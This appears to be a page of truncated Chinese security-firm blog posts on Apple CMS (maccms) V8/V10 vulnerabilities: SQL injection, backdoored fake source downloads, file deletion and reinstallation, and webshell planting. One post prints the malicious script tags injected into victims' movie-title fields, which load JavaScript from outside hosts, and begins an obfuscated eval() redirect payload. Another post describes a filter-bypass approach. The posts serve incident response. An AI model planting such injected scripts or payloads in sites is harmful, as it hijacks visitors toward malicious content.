Maccms

maccms网站被挂马 根源问题在于SQL注入远程代码漏洞

核能气质少年 提交于 2020-01-07 12:17:55
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。 目前maccms官方被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 苹果官方网站因为特殊原因已经停止访问,该内容被禁止访问,但是升级补丁更新的网址还是可以打开的。 截图如下: 苹果CMS漏洞详情: 苹果CMS V8 V10版本存在代码重装漏洞,以及代码后门漏洞,任意文件删除漏洞,通过CNVD-2019-43865的信息安全漏洞通报,可以确认maccms V10存在漏洞,可以伪造恶意代码发送到网站后端进行执行,可以删除网站目录下的任意文件,可删除重装苹果CMS系统的配置文件,导致可以重新安装maccms系统,并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。 苹果CMS V8 V10 源代码存在后门漏洞,经过我们SINE安全技术的检测发现,存在后门的原因是,目前百度搜索苹果官网,maccms官方,排在百度搜索首页的都是仿冒的网站,真正官网地址是www

苹果maccms最新漏洞补丁 防止数据库被反复挂马

一笑奈何 提交于 2020-01-06 21:58:39
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。 首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了,通过我们SINE安全技术对补丁的代码安全分析发现,该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的,于事无补,网站还会继续被攻击。 我们来看下客户网站目前发生的挂马问题,打开网站首页以及各个电影地址都会被插入挂马代码,如下图所示: 打包压缩了一份网站源代码,以及nginx网站日志文件,我们SINE安全工程师在根目录下发现被上传了网站webshell木马文件,通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP,具体的代码如下图: 代码做了加密处理,我们SINE安全对其解密发现该代码的功能可以对网站进行上传,下载,修改代码

苹果cms漏洞POC原理分析与V8 V10被挂马解决办法分享

梦想与她 提交于 2020-01-06 20:57:49
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 苹果CMS漏洞 是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>,尤其电影片名d_name值被直接篡改,并且是批量挂马,导致用户打开网站访问直接弹窗广告并跳转。 JS挂马代码如下: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3 5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e (c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+

网站漏洞修复之苹果cms电影系统

百般思念 提交于 2019-11-30 15:58:16
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下. maccms漏洞分析与修复 苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的,也是比较稳定的,但是在安全方面出现的问题是比较多的,这次发现的是sql注入漏洞,在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示: 代码里的empty($wd函数,在进行判断如果是,或者不是的逻辑过程当中,会将前段用户访问带来的参数,进行安全过滤,我们跟进代码来追寻到苹果CMS的配置文件,在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里. 我们仔细又发现,maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发,并公开在网络上的,已经很久没有更新维护了并且还存在sql注入代码绕过的情况,参数值之间进行实体转换的时候,360的sql拦截规则没有对空白符以及反斜杠进行拦截,导致可以绕过插入恶意参数